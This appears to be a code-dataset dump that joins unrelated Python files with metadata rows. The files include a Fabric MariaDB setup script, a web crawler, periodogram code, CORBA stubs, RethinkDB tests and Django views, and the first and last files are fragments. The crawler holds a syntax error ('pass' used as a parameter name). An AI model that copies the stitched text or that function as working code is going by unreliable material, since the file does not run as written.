warnings.warn("Displacement data in millimeters not provided. Falling back to displacement in pixels.")
return np.array([dic_data["u"][row, col], dic_data["v"][row, col], dic_data["w"][row, col]])
def point_to_position(dic_data, pt, add_displacement=True):
"""
Transforms a point in pixel space into its displaced coordinates (in mm if available, otherwise in pixels).
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
pt : (x, y)
Two-dimensional coordinates of the pixel in global space.
add_displacement : bool, optional
Whether to add deformation to the undeformed position. Default is ``True``.
Returns
-------
``numpy.ndarray``
``(x, y, z)`` position of the point.
"""
row, col = point_to_indices(dic_data, pt)
pos = get_initial_position(dic_data, row, col)
if add_displacement:
pos += get_displacement(dic_data, row, col)
return pos
| mit | -2,652,472,472,064,460,300 | 28.360902 | 117 | 0.595134 | false | 3.754808 | false | false | false |
agabert/zeus | stages/mysql/fabfile.py | 1 | 1593 |
import os
from zeus.config import ConfigManager
from zeus.common import FabricManager
from zeus.common import PasswordManager
from zeus.ubuntu import RepoManager
from zeus.services import ServiceControl
from fabric.api import parallel, roles, run, env
metadata = ConfigManager(os.environ["CONFIGFILE"])
passwords = PasswordManager(os.environ["PASSWORDCACHE"]).passwords
FabricManager.setup(metadata.roles_ports)
@parallel
@roles('openstack_mysql')
def mysql():
RepoManager.install("mariadb-server")
RepoManager.install("python-pymysql")
this = env.host_string.split(":")[0]
run("""
IP="%s"
cat >/etc/mysql/mariadb.conf.d/51-openstack.cnf <<EOF
[mysqld]
bind-address = ${IP}
default-storage-engine = innodb
innodb_file_per_table
max_connections = 4096
collation-server = utf8_general_ci
character-set-server = utf8
init-connect='SET NAMES utf8'
[client]
default-character-set = utf8
[mysql]
default-character-set = utf8
EOF
""" % metadata.servers[this]["ip"])
ServiceControl.relaunch("mysql")
ServiceControl.check("mysqld")
for database in ["keystone", "glance", "nova_api", "nova", "neutron"]:
run("""
echo 'create database if not exists %s;' | mysql -uroot
""" % database)
run("""
cat <<EOF | mysql -uroot
GRANT ALL PRIVILEGES ON %s.* TO '%s'@'localhost' IDENTIFIED BY '%s';
EOF
""" % (database, database, passwords["%s_DBPASS" % database.upper()]))
run("""
cat <<EOF | mysql -uroot
GRANT ALL PRIVILEGES ON %s.* TO '%s'@'%%' IDENTIFIED BY '%s';
EOF
""" % (database, database, passwords["%s_DBPASS" % database.upper()]))
| apache-2.0 | -7,195,580,750,168,113,000 | 22.086957 | 74 | 0.697426 | false | 3.224696 | false | false | false |
wf4ever/ro-manager | src/MiscUtils/MockHttpResources.py | 1 | 2438 | # Utilities to mock HTTP resources for testing.
#
# with HttpMockResources(baseuri, path):
# # test code here
# or
# @HttpMockResourcesZZZZ(baseuri, path)
# def test_stuff(...)
#
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import urllib
import httpretty
import ScanDirectories
from FileMimeTypes import FileMimeTypes
FileType_MimeType = dict([ (ft,ct) for (ct, fts) in FileMimeTypes
for ft in fts ])
def HttpContentType(filename):
fsplit = filename.rsplit(".", 1)
if len(fsplit) == 2 and fsplit[1] in FileType_MimeType:
return FileType_MimeType[fsplit[1]]
return "application/octet-stream"
class MockHttpFileResources(object):
def __init__(self, baseuri, path):
self._baseuri = baseuri
self._path = path
return
def __enter__(self):
httpretty.enable()
# register stuff...
refs = ScanDirectories.CollectDirectoryContents(self._path, baseDir=self._path,
listDirs=False, listFiles=True, recursive=True)
for r in refs:
ru = self._baseuri + urllib.pathname2url(r)
rt = HttpContentType(r)
with open(self._path+r, 'r') as cf:
httpretty.register_uri(httpretty.GET, ru, status=200, content_type=rt,
body=cf.read())
httpretty.register_uri(httpretty.HEAD, ru, status=200, content_type=rt)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
suppress_exc = False
httpretty.disable()
return suppress_exc
class MockHttpDictResources(object):
def __init__(self, baseuri, resourcedict):
self._baseuri = baseuri
self._dict = resourcedict
return
def __enter__(self):
httpretty.enable()
# register stuff...
for r in self._dict.keys():
ru = self._baseuri + r
rt = HttpContentType(r)
httpretty.register_uri(httpretty.GET, ru, status=200, content_type=rt,
body=self._dict[r])
httpretty.register_uri(httpretty.HEAD, ru, status=200, content_type=rt)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
suppress_exc = False
httpretty.disable()
return suppress_exc
# End.
| mit | 6,390,194,522,604,970,000 | 30.25641 | 88 | 0.599262 | false | 3.622585 | false | false | false |
drdangersimon/lomb_scargle | numpy_imp.py | 1 | 2279 | import numpy as np
import numexpr as ne
'''Numpy implimantation of lomb-scargle periodgram'''
def lombscargle_num(x, y, freqs):
# Check input sizes
if x.shape[0] != y.shape[0]:
raise ValueError("Input arrays do not have the same size.")
# Create empty array for output periodogram
pgram = np.empty(freqs.shape[0], dtype=np.float64)
for i in xrange(freqs.shape[0]):
c = np.cos(freqs[i] * x)
s = np.sin(freqs[i] * x)
xc = np.sum(y * c)
xs = np.sum(y * s)
cc = np.sum(c**2)
ss = np.sum(s**2)
cs = np.sum(c * s)
tau = np.math.atan2(2 * cs, cc - ss) / (2 * freqs[i])
c_tau = np.cos(freqs[i] * tau)
s_tau = np.sin(freqs[i] * tau)
c_tau2 = c_tau * c_tau
s_tau2 = s_tau * s_tau
cs_tau = 2 * c_tau * s_tau
pgram[i] = 0.5 * (((c_tau * xc + s_tau * xs)**2 / \
(c_tau2 * cc + cs_tau * cs + s_tau2 * ss)) + \
((c_tau * xs - s_tau * xc)**2 / \
(c_tau2 * ss - cs_tau * cs + s_tau2 * cc)))
return pgram
def lombscargle_ne(x, y, freqs):
'''uses numexp to do numpy stuff'''
# Check input sizes
if x.shape[0] != y.shape[0]:
raise ValueError("Input arrays do not have the same size.")
# Create empty array for output periodogram
pgram = np.empty(freqs.shape[0], dtype=np.float64)
for i in xrange(freqs.shape[0]):
f = freqs[i]
c = ne.evaluate('cos(f * x)')
s = ne.evaluate('sin(f * x)')
xc = ne.evaluate('sum(y * c)')
xs = ne.evaluate('sum(y * s)')
cc = ne.evaluate('sum(c**2)')
ss = ne.evaluate('sum(s**2)')
cs = ne.evaluate('sum(c * s)')
tau = ne.evaluate('arctan2(2 * cs, cc - ss) / (2. * f)')
c_tau = ne.evaluate('cos(f * tau)')
s_tau = ne.evaluate('sin(f * tau)')
c_tau2 = ne.evaluate('c_tau * c_tau')
s_tau2 = ne.evaluate('s_tau * s_tau')
cs_tau = ne.evaluate('2 * c_tau * s_tau')
pgram[i] = ne.evaluate('''0.5 * (((c_tau * xc + s_tau * xs)**2 /
(c_tau2 * cc + cs_tau * cs + s_tau2 * ss)) +
((c_tau * xs - s_tau * xc)**2 /
(c_tau2 * ss - cs_tau * cs + s_tau2 * cc)))''')
return pgram
| mit | -4,128,462,303,800,078,000 | 31.557143 | 73 | 0.48925 | false | 2.82404 | false | false | false |
x-web/social-network-user-influence-analysis | aminer/cralwer.py | 1 | 1916 | #!/usr/bin/python
# coding: utf-8
# crawling aminer.org data
__author__ = "x-web"
import sys
import urllib2
import json
import time
def fetchUser(start = 0, offset = 99, limit = 100, sleeptime = 3):
fwriter = open('user.json', 'w')
api = 'https://api.aminer.org/api/rank/person/h_index/'
errortime = 0
count = 1
while (start < limit):
curapi = api + str(start) + '/' + str(offset)
print 'fetch ' + curapi
try:
response = urllib2.urlopen(urllib2.Request(curapi))
data = response.read()
fwriter.write(data + "\n")
start = start + offset + 1
print str(count) + ' ok!'
except:
print str(count) + ' error!'
errortime += 1
if errortime > 3:
start = start + offset + 1
time.sleep(sleeptime)
count += 1
fwriter.close()
return
def fetchPub(sleeptime = 3, pass = 0):
freader = open('user.json', 'r')
fwriter = open('publication.json', 'w')
count = 0
for raw_data in freader:
json_array = json.loads(raw_data)
for user in json_array:
count += 1
if count <= pass:
print 'pass ' + str(count)
continue
uid = user['id']
n_pubs = user['n_pubs']
api = 'https://api.aminer.org/api/person/pubs/' + str(uid) +'/all/year/0/' + str(n_pubs)
print 'fetch ' + api
try:
response = urllib2.urlopen(urllib2.Request(api))
data = response.read()
fwriter.write(data + "\n")
print str(count) + ' ok!'
except:
print str(count) + ' error!'
time.sleep(sleeptime)
freader.close()
fwriter.close()
return
if __name__ == '__main__':
# fetchUser(limit = 10000)
fetchPub()
print 'Done!'
| mit | 1,649,795,766,065,398,500 | 27.597015 | 100 | 0.505219 | false | 3.601504 | false | false | false |
CodeScaleInc/log4django | log4django/views/logrecord/__init__.py | 1 | 2055 | from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import TemplateView
from ...models import LogRecord, App
from ...settings import PAGE_SIZE
from ...decorators import authenticate
from .. import _filter_records
class LogRecordList(TemplateView):
template_name = 'log4django/bootstrap/logrecord/list.html'
http_method_names = ('get',)
@method_decorator(authenticate())
def get(self, request, *args, **kwargs):
logrecord_qs = _filter_records(request)
paginator = Paginator(logrecord_qs, PAGE_SIZE)
page = request.GET.get('page', None)
try:
records = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
records = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
records = paginator.page(paginator.num_pages)
# Getting filtering values.
apps = App.objects.all()
loggers = set([r.loggerName for r in records])
levels = LogRecord.LEVEL
return self.render_to_response(dict(
records=records, apps=apps, loggers=loggers, levels=levels,
filter_levels=[int(l) for l in request.GET.getlist('level')]
))
class LogRecordDetail(TemplateView):
template_name = 'log4django/bootstrap/logrecord/detail.html'
http_method_names = ('get',)
@method_decorator(authenticate())
def get(self, request, logrecord_id=None):
record = get_object_or_404(LogRecord, pk=logrecord_id)
related = None
if record.request_id:
related = LogRecord.objects.filter(
Q(request_id=record.request_id)
& ~Q(pk=record.pk)
)
return self.render_to_response(dict(
record=record, related=related
))
| bsd-3-clause | 2,427,831,677,460,595,000 | 35.052632 | 80 | 0.650122 | false | 3.967181 | false | false | false |
amonmoce/corba_examples | omniORBpy-4.2.1/build/python/COS/CosTypedNotifyComm_idl.py | 1 | 6759 | # Python stubs generated by omniidl from /usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl
# DO NOT EDIT THIS FILE!
import omniORB, _omnipy
from omniORB import CORBA, PortableServer
_0_CORBA = CORBA
_omnipy.checkVersion(4,2, __file__, 1)
try:
property
except NameError:
def property(*args):
return None
# #include "CosNotification.idl"
import CosNotification_idl
_0_CosNotification = omniORB.openModule("CosNotification")
_0_CosNotification__POA = omniORB.openModule("CosNotification__POA")
# #include "CosEventComm.idl"
import CosEventComm_idl
_0_CosEventComm = omniORB.openModule("CosEventComm")
_0_CosEventComm__POA = omniORB.openModule("CosEventComm__POA")
# #include "CosNotifyComm.idl"
import CosNotifyComm_idl
_0_CosNotifyComm = omniORB.openModule("CosNotifyComm")
_0_CosNotifyComm__POA = omniORB.openModule("CosNotifyComm__POA")
# #include "CosNotifyFilter.idl"
import CosNotifyFilter_idl
_0_CosNotifyFilter = omniORB.openModule("CosNotifyFilter")
_0_CosNotifyFilter__POA = omniORB.openModule("CosNotifyFilter__POA")
# #include "CosEventChannelAdmin.idl"
import CosEventChannelAdmin_idl
_0_CosEventChannelAdmin = omniORB.openModule("CosEventChannelAdmin")
_0_CosEventChannelAdmin__POA = omniORB.openModule("CosEventChannelAdmin__POA")
# #include "CosNotifyChannelAdmin.idl"
import CosNotifyChannelAdmin_idl
_0_CosNotifyChannelAdmin = omniORB.openModule("CosNotifyChannelAdmin")
_0_CosNotifyChannelAdmin__POA = omniORB.openModule("CosNotifyChannelAdmin__POA")
# #include "CosTypedEventComm.idl"
import CosTypedEventComm_idl
_0_CosTypedEventComm = omniORB.openModule("CosTypedEventComm")
_0_CosTypedEventComm__POA = omniORB.openModule("CosTypedEventComm__POA")
#
# Start of module "CosTypedNotifyComm"
#
__name__ = "CosTypedNotifyComm"
_0_CosTypedNotifyComm = omniORB.openModule("CosTypedNotifyComm", r"/usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl")
_0_CosTypedNotifyComm__POA = omniORB.openModule("CosTypedNotifyComm__POA", r"/usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl")
# interface TypedPushConsumer
_0_CosTypedNotifyComm._d_TypedPushConsumer = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosTypedNotifyComm/TypedPushConsumer:1.0", "TypedPushConsumer")
omniORB.typeMapping["IDL:omg.org/CosTypedNotifyComm/TypedPushConsumer:1.0"] = _0_CosTypedNotifyComm._d_TypedPushConsumer
_0_CosTypedNotifyComm.TypedPushConsumer = omniORB.newEmptyClass()
class TypedPushConsumer (_0_CosTypedEventComm.TypedPushConsumer, _0_CosNotifyComm.NotifyPublish):
_NP_RepositoryId = _0_CosTypedNotifyComm._d_TypedPushConsumer[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosTypedNotifyComm.TypedPushConsumer = TypedPushConsumer
_0_CosTypedNotifyComm._tc_TypedPushConsumer = omniORB.tcInternal.createTypeCode(_0_CosTypedNotifyComm._d_TypedPushConsumer)
omniORB.registerType(TypedPushConsumer._NP_RepositoryId, _0_CosTypedNotifyComm._d_TypedPushConsumer, _0_CosTypedNotifyComm._tc_TypedPushConsumer)
# TypedPushConsumer object reference
class _objref_TypedPushConsumer (_0_CosTypedEventComm._objref_TypedPushConsumer, _0_CosNotifyComm._objref_NotifyPublish):
_NP_RepositoryId = TypedPushConsumer._NP_RepositoryId
def __init__(self, obj):
_0_CosTypedEventComm._objref_TypedPushConsumer.__init__(self, obj)
_0_CosNotifyComm._objref_NotifyPublish.__init__(self, obj)
omniORB.registerObjref(TypedPushConsumer._NP_RepositoryId, _objref_TypedPushConsumer)
_0_CosTypedNotifyComm._objref_TypedPushConsumer = _objref_TypedPushConsumer
del TypedPushConsumer, _objref_TypedPushConsumer
# TypedPushConsumer skeleton
__name__ = "CosTypedNotifyComm__POA"
class TypedPushConsumer (_0_CosTypedEventComm__POA.TypedPushConsumer, _0_CosNotifyComm__POA.NotifyPublish):
_NP_RepositoryId = _0_CosTypedNotifyComm.TypedPushConsumer._NP_RepositoryId
_omni_op_d = {}
_omni_op_d.update(_0_CosTypedEventComm__POA.TypedPushConsumer._omni_op_d)
_omni_op_d.update(_0_CosNotifyComm__POA.NotifyPublish._omni_op_d)
TypedPushConsumer._omni_skeleton = TypedPushConsumer
_0_CosTypedNotifyComm__POA.TypedPushConsumer = TypedPushConsumer
omniORB.registerSkeleton(TypedPushConsumer._NP_RepositoryId, TypedPushConsumer)
del TypedPushConsumer
__name__ = "CosTypedNotifyComm"
# interface TypedPullSupplier
_0_CosTypedNotifyComm._d_TypedPullSupplier = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosTypedNotifyComm/TypedPullSupplier:1.0", "TypedPullSupplier")
omniORB.typeMapping["IDL:omg.org/CosTypedNotifyComm/TypedPullSupplier:1.0"] = _0_CosTypedNotifyComm._d_TypedPullSupplier
_0_CosTypedNotifyComm.TypedPullSupplier = omniORB.newEmptyClass()
class TypedPullSupplier (_0_CosTypedEventComm.TypedPullSupplier, _0_CosNotifyComm.NotifySubscribe):
_NP_RepositoryId = _0_CosTypedNotifyComm._d_TypedPullSupplier[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosTypedNotifyComm.TypedPullSupplier = TypedPullSupplier
_0_CosTypedNotifyComm._tc_TypedPullSupplier = omniORB.tcInternal.createTypeCode(_0_CosTypedNotifyComm._d_TypedPullSupplier)
omniORB.registerType(TypedPullSupplier._NP_RepositoryId, _0_CosTypedNotifyComm._d_TypedPullSupplier, _0_CosTypedNotifyComm._tc_TypedPullSupplier)
# TypedPullSupplier object reference
class _objref_TypedPullSupplier (_0_CosTypedEventComm._objref_TypedPullSupplier, _0_CosNotifyComm._objref_NotifySubscribe):
_NP_RepositoryId = TypedPullSupplier._NP_RepositoryId
def __init__(self, obj):
_0_CosTypedEventComm._objref_TypedPullSupplier.__init__(self, obj)
_0_CosNotifyComm._objref_NotifySubscribe.__init__(self, obj)
omniORB.registerObjref(TypedPullSupplier._NP_RepositoryId, _objref_TypedPullSupplier)
_0_CosTypedNotifyComm._objref_TypedPullSupplier = _objref_TypedPullSupplier
del TypedPullSupplier, _objref_TypedPullSupplier
# TypedPullSupplier skeleton
__name__ = "CosTypedNotifyComm__POA"
class TypedPullSupplier (_0_CosTypedEventComm__POA.TypedPullSupplier, _0_CosNotifyComm__POA.NotifySubscribe):
_NP_RepositoryId = _0_CosTypedNotifyComm.TypedPullSupplier._NP_RepositoryId
_omni_op_d = {}
_omni_op_d.update(_0_CosTypedEventComm__POA.TypedPullSupplier._omni_op_d)
_omni_op_d.update(_0_CosNotifyComm__POA.NotifySubscribe._omni_op_d)
TypedPullSupplier._omni_skeleton = TypedPullSupplier
_0_CosTypedNotifyComm__POA.TypedPullSupplier = TypedPullSupplier
omniORB.registerSkeleton(TypedPullSupplier._NP_RepositoryId, TypedPullSupplier)
del TypedPullSupplier
__name__ = "CosTypedNotifyComm"
#
# End of module "CosTypedNotifyComm"
#
__name__ = "CosTypedNotifyComm_idl"
_exported_modules = ( "CosTypedNotifyComm", )
# The end.
| mit | 2,434,784,445,631,023,000 | 41.778481 | 152 | 0.79065 | false | 3.084893 | false | false | false |
XDocker/Engine | xdocker/job/views.py | 1 | 3609 | from flask import Blueprint
from flask.ext.login import current_user, login_required
from ..helpers import check_args, make_response
from .helpers import get_job_log, get_job_status
from ..app_exceptions import PermissionDenied
job = Blueprint('job', __name__)
@job.route("/getLog/<job_id>", methods=["POST"])
@login_required
def get_log(job_id):
"""Get log for job
**Example request**
.. sourcecode:: http
POST /getLog/<job_id> HTTP/1.1
{
"token": "<token>",
"line_num": 10
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/json
Server: nginx/1.1.19
Vary: Accept-Encoding
{
"status": "OK",
"log": "<log lines>"
}
:jsonparam string token: Authentication token
:jsonparam integer line_num: Number of log lines to return(max 100, 10 default)
:statuscode 200: no error
:statuscode 401: not authorized
:>json string log: Last logs
"""
data = check_args()
log = get_job_log(data['username'], job_id)
return make_response(log=log)
@job.route("/getDeploymentStatus/<job_id>", methods=["POST"])
@login_required
def job_status(job_id):
"""Get job status
**Example request**
.. sourcecode:: http
POST /getDeploymentStatus/<job_id> HTTP/1.1
{
"token": "<token>"
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/json
Server: nginx/1.1.19
Vary: Accept-Encoding
{
"status": "OK",
"job_status": "Completed"
}
:jsonparam string token: Authentication token
:statuscode 200: no error
:statuscode 401: not authorized
:>json string job_status: Job status
"""
res_dict = get_job_status(job_id)
return make_response(**res_dict)
@job.route("/getStatusOfAllDeployments", methods=["POST"])
@login_required
def get_all_deployments():
"""Get job ids
**Example request**
.. sourcecode:: http
POST /getStatusOfAllDeployments HTTP/1.1
{
"token": "<token>",
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "OK",
"jobs": [
{
"job_id": "<job-id>",
"fail": true,
"fail_code": "BadPort",
"fail_message": "Wrong port: 20,",
"result": null,
"job_status": "failed"
}
]
}
:jsonparam string token: Authentication token
:statuscode 200: no error
:statuscode 401: not authorized
:>json array jobs: Statuses of user`s jobs
:>json string jobs.job_status: Status of user`s jobs(failed, Completed, started, null)
:>json boolean jobs.fail: whether it failed
:>json any jobs.result: job result
:>json string jobs.fail_code: fail code if failed
:>json string jobs.job_id: Job id
:>json string jobs.fail_message: fail message if failed
"""
statuses = []
for job_id in current_user.jobs:
try:
res_dict = get_job_status(job_id)
except PermissionDenied:
continue
if res_dict['job_status'] is None:
continue
res_dict['job_id'] = job_id
statuses.append(res_dict)
return make_response(jobs=statuses)
| apache-2.0 | 3,459,422,245,718,154,000 | 23.385135 | 90 | 0.563037 | false | 3.922826 | false | false | false |
TRManderson/petersen | petersen/app/users/__init__.py | 1 | 1244 | import flask
from flask import request, abort
from petersen.app.base import app
from petersen.models import User, UserBadge, Tag, needs_db
from sqlalchemy import or_
@app.route('/users', methods=['GET'])
@needs_db
def user_filter(db_session):
data = request.args
if data is None:
abort(400)
filters = []
for (k, v) in data.items():
if k == 'name':
filters.append(
User.name.like("%{}%".format(v))
)
elif k == 'tags':
filters.append(
or_(
*[
Tag.tag == t
for t in v.split(',')
]
)
)
elif k == 'badges':
filters.append(
or_(
*[
UserBadge.badge_id == t
for t in v.split(',')
]
)
)
else:
abort(400)
peeps = db_session.query(
User
).join(UserBadge, Tag).filter(
*filters
)
resp = [
{
p.to_json()
}
for p in peeps
]
return flask.jsonify(**{
'users': resp
})
| mit | -2,760,935,717,966,158,300 | 20.084746 | 58 | 0.39791 | false | 4.260274 | false | false | false |
isidorn/test2 | drivers/python/test.py | 1 | 5269 | import rethinkdb as r
c = r.connect(host='localhost', port=28015)
def tests():
print r.expr(1).run(c)
print r.expr("bob").run(c)
print r.expr(True).run(c)
print r.expr(False).run(c)
print r.expr(3.12).run(c)
print r.expr([1,2,3,4,5]).run(c)
print r.expr({'a':1, 'b':2}).run(c)
#print r.js('1 + 1').run(c)
print (r.expr(1) == 2).run(c) # false
print (r.expr(1) != 2).run(c) # true
print (r.expr(1) < 2).run(c) # true
print (r.expr(1) <= 2).run(c) # true
print (r.expr(1) > 2).run(c) # false
print (r.expr(1) >= 2).run(c) # false
print (~r.expr(True)).run(c) # false
print (~r.expr(False)).run(c) # true
print (r.expr(True).not_()).run(c) # false
print (r.expr(False).not_()).run(c) # true
print (r.expr(1) + 2).run(c) # 3
print (r.expr(1) - 2).run(c) # -1
print (r.expr(1) * 2).run(c) # 2
print (r.expr(1) / 2).run(c) # .5
print (r.expr(12) % 10).run(c) # 2
print (((r.expr(12) / 6) * 4) - 3).run(c) # 5
arr = r.expr([1,2,3,4])
print arr.append(5).run(c)
print arr[1].run(c)
print arr[2].run(c)
print arr[1:2].run(c)
print arr[:2].run(c)
print arr[2:].run(c)
print arr.count().run(c)
print arr.union(arr).run(c)
print arr.union(arr).distinct().run(c)
print arr.inner_join(arr, lambda a,b: a == b).run(c)
print arr.outer_join(arr, lambda a,b: a == (b - 2)).run(c)
#print r.expr([{'id':0, 'a':0}, {'id':1, 'a':0}]).eq_join([{'id':0, 'b':1}, {'id':1, 'b':1}], 'id').run(c)
obj = r.expr({'a':1, 'b':2})
print obj['a'].run(c)
print obj.contains('a').run(c)
print obj.pluck('a').run(c)
print obj.without('a').run(c)
print obj.merge({'c':3}).run(c)
print r.db_list().run(c)
print r.db_create('bob').run(c)
print r.db_create('test').run(c)
print r.db_list().run(c)
print r.db('test').table_list().run(c)
print r.db('test').table_create('test').run(c)
print r.db('test').table_create('bob').run(c)
print r.db('test').table_list().run(c)
print r.db('test').table_drop('bob').run(c)
print r.db('test').table_list().run(c)
test = r.db('test').table('test')
print test.run(c)
print test.insert({'id': 1, 'a': 2}).run(c)
print test.insert({'id': 2, 'a': 3}).run(c)
print test.insert({'id': 3, 'a': 4}).run(c)
print test.run(c)
print test.between(right_bound=2).run(c)
print test.update(lambda row: {'a': row['a']+1}).run(c)
print test.run(c)
print test.replace(lambda row: {'id':row['id'], 'a': row['a']+1}).run(c)
print test.run(c)
print test.delete().run(c)
print test.run(c)
print r.expr(1).do(lambda a: a + 1).run(c)
print r.expr(2).do(lambda a: {'b': a / a}).run(c)
print r.expr([1,2,3]).map(lambda a: a + 1).run(c)
print r.expr([1,2,3]).map(lambda a: a.do(lambda b: b+a)).run(c)
print r.expr([1,2,3]).reduce(lambda a, b: a+b).run(c)
print r.expr([1,2,3,4]).filter(lambda a: a < 3).run(c)
print r.expr([1,2]).concat_map(lambda a: [a,a]).run(c)
print r.branch(r.expr(1) < 2, "a", "b").run(c)
print r.branch(r.expr(1) < 0, "a", "b").run(c)
print (r.expr(True) & r.expr(False)).run(c)
print (r.expr(True) | r.expr(False)).run(c)
print (r.expr(True) & r.expr(True)).run(c)
print (r.expr(False) | r.expr(False)).run(c)
#print r.expr([1,2]).map(3).run(c)
#print r.expr([1,2]).map(r.row + 3).run(c)
print r.expr([{'id':2}, {'id':3}, {'id':1}]).order_by('id').run(c)
print r.expr([{'g':0, 'v':1}, {'g':0, 'v':2}, {'g':1, 'v':1}, {'g':1, 'v':2}]).grouped_map_reduce(lambda row: row['g'], lambda row: row['v'] + 1, lambda a,b: a + b).run(c)
#print r.expr([1,2]).for_each(lambda i: [test.insert({'id':i, 'a': i+1})]).run(c)
print test.run(c)
class except_printer:
def __enter__(self):
pass
def __exit__(self, typ, value, traceback):
print value
return True
def go():
with except_printer():
r.connect(host="localhost", port="123abc")
with except_printer():
r.expr({'err': r.error('bob')}).run(c)
with except_printer():
r.expr([1,2,3, r.error('bob')]).run(c)
with except_printer():
(((r.expr(1) + 1) - 8) * r.error('bob')).run(c)
with except_printer():
r.expr([1,2,3]).append(r.error('bob')).run(c)
with except_printer():
r.expr([1,2,3, r.error('bob')])[1:].run(c)
with except_printer():
r.expr({'a':r.error('bob')})['a'].run(c)
with except_printer():
r.db('test').table('test').filter(lambda a: a.contains(r.error('bob'))).run(c)
with except_printer():
r.expr(1).do(lambda x: r.error('bob')).run(c)
with except_printer():
r.expr(1).do(lambda x: x + r.error('bob')).run(c)
with except_printer():
r.branch(r.db('test').table('test').get(0)['a'].contains(r.error('bob')), r.expr(1), r.expr(2)).run(c)
with except_printer():
r.expr([1,2]).reduce(lambda a,b: a + r.error("bob")).run(c)
#with except_printer():
# r.expr([1,2,3]).do(lambda a: a.map(lambda b: a.filter(lambda c: (b + c) % a.reduce(base=9, lambda d, e: d / r.branch(e < 4, "bob", r.error('deep')))))).run(c)
for db in r.db_list().run(c):
r.db_drop(db).run(c)
tests()
go()
| agpl-3.0 | 5,220,351,879,085,170,000 | 34.126667 | 175 | 0.536155 | false | 2.484206 | true | false | false |
ActiveState/code | recipes/Python/578976_Objectify_of_a_XML_node/recipe-578976.py | 1 | 3154 | """
Tool for converting an XML node into an object instance.
.. module:: objectify
:platform: Unix, Windows
:synopsis: providing conversion for XML nodes.
.. moduleauthor:: Thomas Lehmann
License
=======
Copyright (c) 2014 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
def objectify(node, attributes=None):
"""
Converting XML node into an object instance.
Taking the tag name with first letter as upper case
as the name forgenerating a class derived from object
with the node attributes as fields and the values as 'default'.
>>> import xml.etree.ElementTree as ET
>>> document = ET.fromstring('<test-obj int-val="1" str-val="hello" float-val="1.23"/>')
>>> instance = objectify(document, {"object-id": "1234"})
>>> print(instance.__class__.__name__)
TestObj
>>> print(instance.object_id)
1234
>>> print(instance.int_val)
1
>>> print(instance.str_val)
hello
>>> print(instance.float_val)
1.23
:param node: xml node (from lxml.etree or xml.etree)
:param attributes: allows providing fields and default values
which might be overwritten by the XML node attributes.
:returns: instance with node attributes as fields
"""
def convert(attribute_value):
"""
Convert string to float or int were possible.
:param attribute_value: string value
:return: depend on re.match a string, a float or an int value.
"""
if re.match(r"\d+\.\d+", attribute_value):
return float(attribute_value)
if re.match(r"\d+", attribute_value):
return int(attribute_value)
return attribute_value
if None == attributes:
attributes = {}
else:
attributes = (dict([(key.replace("-", "_"), convert(value))
for key, value in attributes.items()]))
attributes.update(dict([(key.replace("-", "_"), convert(value))
for key, value in node.attrib.items()]))
class_name = "".join([entry.title() for entry in node.tag.split("-")])
return type(class_name, (object,), attributes)()
| mit | 4,937,893,628,476,440,000 | 37 | 92 | 0.677235 | false | 4.338377 | false | false | false |
sinnwerkstatt/landmatrix | apps/grid/views/filter.py | 1 | 25004 | from collections import OrderedDict
from datetime import datetime
from bootstrap3_datetime.widgets import DateTimePicker
from django import forms
from django.utils.translation import ugettext as _
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from apps.api.filters import Filter, PresetFilter
from apps.grid.fields import TitleField, YearMonthDateField
from apps.grid.forms.investor_form import (
OperationalCompanyForm,
ParentInvestorForm,
ParentStakeholderForm,
)
from apps.grid.views.browse_filter_conditions import (
get_activity_field_by_key,
get_investor_field_by_key,
)
from apps.grid.views.utils import DEAL_FORMS
from apps.landmatrix.forms import ActivityFilterForm, InvestorFilterForm
from apps.landmatrix.models import Country, FilterPreset, FilterPresetGroup, Region
class FilterWidgetAjaxView(APIView):
renderer_classes = (JSONRenderer,)
TYPE_STRING = "string"
TYPE_NUMERIC = "numeric"
TYPE_BOOLEAN = "boolean"
TYPE_LIST = "list"
TYPE_AUTOCOMPLETE = "autocomplete"
TYPE_LIST_MULTIPLE = "multiple"
TYPE_DATE = "date"
FIELD_TYPE_MAPPING = OrderedDict(
(
(
YearMonthDateField,
TYPE_DATE,
